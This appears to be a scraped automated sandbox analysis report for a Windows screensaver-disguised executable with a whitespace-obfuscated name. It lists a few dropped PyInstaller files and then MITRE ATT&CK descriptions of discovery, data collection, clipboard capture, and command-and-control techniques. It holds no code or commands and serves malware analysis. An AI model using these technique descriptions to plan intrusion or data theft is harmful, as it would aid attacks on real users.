C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd

Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre